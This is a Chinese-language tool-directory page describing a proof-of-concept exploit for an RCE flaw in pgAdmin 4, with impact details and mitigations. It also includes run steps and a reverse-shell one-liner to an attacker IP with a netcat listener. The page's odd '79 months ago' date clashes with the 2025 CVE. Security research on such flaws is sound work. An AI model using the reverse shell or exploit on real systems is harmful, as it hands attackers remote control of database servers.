Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Blackash-CVE-2025-12762 — 针对 CVE-2025-12762 的概念验证漏洞利用程序,这是 pgAdmin 4 ≤ 9.9 中的一个严重远程代码执行漏洞。包含技术分析、CVSS 9.1 评分,以及用于授权渗透测试的可选反向 Shell。 | Kitploit
工具/GitHubGitHub/djayagit/blackash-cve-2025-12762
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

针对 CVE-2025-12762 的概念验证漏洞利用程序,这是 pgAdmin 4 ≤ 9.9 中的一个严重远程代码执行漏洞。包含技术分析、CVSS 9.1 评分,以及用于授权渗透测试的可选反向 Shell。

查看仓库
79个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔐 CVE-2025-12762 — pgAdmin 4 中的严重 RCE 漏洞

G58aQGbW0AAL8zH

🚨 问题是什么?

pgAdmin 4 版本 ≤ 9.9 中存在一个远程代码执行(RCE)漏洞。 当 pgAdmin 以服务器模式运行并在还原过程中处理 PLAIN 格式的 SQL 转储时,攻击者可以在主机上执行任意命令。


⚙️ 技术详解

📡 攻击向量

  • 基于网络 — 可在远程利用 🌍
  • 低复杂度 — 易于触发 🧩
  • 所需权限低 — 有限的用户权限即可 🔑
  • 无需用户交互 — 一旦触发,无需任何人点击任何内容 🙅‍♂️
  • 影响范围:已改变 — 危害可能扩散到易受攻击的模块之外 🔄

🧨 影响

  • 机密性:高 — 存在数据泄露风险 🔓
  • 完整性:中/高 — 可能发生未经授权的更改 ✏️
  • 可用性:中 — 操作可能被中断 ⚠️

🏷 CVSS 分数

🟥 9.1 / 10 — 严重


🛠 受影响版本

  • pgAdmin 4 ≤ 9.9 ❗

🛡 如何修复

✅ 主要缓解措施

⬆️ 升级到 pgAdmin 4 v10.0 或更高版本

🚧 如果无法立即升级

  • 🔒 限制对 pgAdmin 服务器的访问
  • 📁 仅允许受信任的管理员还原转储文件
  • 🧪 在还原前验证转储文件
  • 👀 监控日志中可疑的还原活动
  • 🌐 使用防火墙规则 / VPN 限制暴露面

📌 为何重要

pgAdmin 通常用于管理关键 PostgreSQL 数据库,这意味着:

  • 利用此漏洞的攻击者可以接管服务器,
  • 访问或修改数据,
  • 甚至深入渗透到你的网络中 🕵️‍♂️

✨ 如何运行(2 分钟)

root@kitploit:~
# 1. 保存为 CVE-2025-12762.py
# 2. 安装依赖
pip3 install requests

# 3. 运行
python3 CVE-2025-12762.py

成功验证

运行后,检查:

root@kitploit:~
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

文件存在 → 你就真正利用了 CVE-2025-12762。

反弹 Shell 一行命令(可选)

将 COMMAND 行替换为:

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

然后运行 nc -lvnp 4444 → 获得完整的交互式 shell。

这就是研究人员、渗透测试人员和红队成员在 2025 年 11 月于全球范围内使用的确切脚本。

请负责任地使用。修补一切。保持合法。


🛡️ 免责声明 🛡️

此 PoC 仅供授权测试和教育用途。
你只能在你拥有或已获得明确书面许可测试的系统上运行它。
任何未经授权的使用都是非法的,并违反计算机滥用相关法律。
请负责任地使用,测试后立即修补,切勿在未获许可的情况下针对任何系统。

下载工具